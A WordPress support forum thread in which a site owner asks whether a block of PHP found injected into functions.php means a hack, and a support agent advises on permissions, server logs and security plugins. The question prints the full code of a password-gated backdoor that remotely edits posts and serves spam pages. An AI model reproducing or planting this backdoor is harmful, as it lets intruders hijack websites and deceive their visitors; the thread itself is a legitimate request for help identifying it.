Site hacked ? Code added in functions.php

Hello,

In some of my websites, this code has beed added at the top of functions.php (it uses mysql_espace_string so php error with php7), do you know where it comes from ? Have my websites been hacked ?

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '3801616fd2603d331cbc3e5443ad0364'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'posts WHERE post_status = "publish" AND post_type = "post" ORDER BY ID DESC', ARRAY_A) as $data)
{
$data['code'] = '';

if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}

print '<e><w>1</w><url>' . $data['guid'] . '</url>' . $data['code'] . '<id>' . $data['ID'] . '</id></e>' . "\r\n";
}
break;

case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT post_content FROM ' . $wpdb->prefix . 'posts WHERE ID = "'.mysql_escape_string($_REQUEST['id']).'"');

$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

if ($wpdb->query('UPDATE ' . $wpdb->prefix . 'posts SET post_content = "' . mysql_escape_string($post_content) . '" WHERE ID = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;

case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM ' . $wpdb->prefix . 'datalist WHERE url = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO ' . $wpdb->prefix . 'datalist SET url = "/'.mysql_escape_string($_REQUEST['url']).'", title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string($_REQUEST['content']).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;

default: print "ERROR_WP_ACTION WP_URL_CD";
}

die("");
}

if ( $wpdb->get_var('SELECT count(*) FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '<!DOCTYPE html>';
print '<html ';
language_attributes();
print ' class="no-js">';
print '<head>';
print '<title>'.stripslashes($data -> title).'</title>';
print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
print '<meta name="robots" content="index, follow" />';
print '<meta charset="';
bloginfo( 'charset' );
print '" />';
print '<meta name="viewport" content="width=device-width">';
print '<link rel="profile" target="_blank" href="http://gmpg.org/xfn/11">';
print '<link rel="pingback" href="';
bloginfo( 'pingback_url' );
print '">';
wp_head();
print '</head>';
print '<body>';
print '<div id="content" class="site-content">';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}

exit;
}

?>

  • Adam Czajczyk

    Hello Jean,

    I hope you're well today and thank you for your question!

    I believe I have seen that code once on some site but I was told that the theme is "as the theme install package provided". It seems however that it might need some further investigation.

    I'm not sure where this code came from but can you please tell me what themes did it affected?

    As for prevention. Changing file permissions for theme files to 644 or even 444 using FTP or cPanel's "File Manager" tool should stop any code being added unless there are other "security glitches". It would however be best to get in touch with your host and ask them to review server logs to check for any suspicious/malicious activity. That could help identify the source of that code and pinpoint potential threats. Could you ask them to check these logs for you?

    Let me know about results, please.

    Kind regards,
    Adam

  • Adam Czajczyk

    Hello Jean!

    Thanks you for your replay. It does look certainly like a "hack", my point was only that when I came across it (only once so far) I was specifically told by the site owner that I shouldn't worry about it - the issue was completely unrelated. The question is though how to prevent it rather than where does it come from.

    Wordfence should help and our Defender would also be helpful along it. Changing file permissions as I suggested in my previous post would also prevent code from being added to the file, unless there's a "security glitch" on server level, in which case it would be a server admin task to identify it and remove.

    It would however be good to review server logs and site statistics in search of any "suspicious traffic" as usually it can be pinpointed and assigned to some IPs/domains. Those could then be blocked and that should additionally protect the site in future.

    Kind regards,
    Adam

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.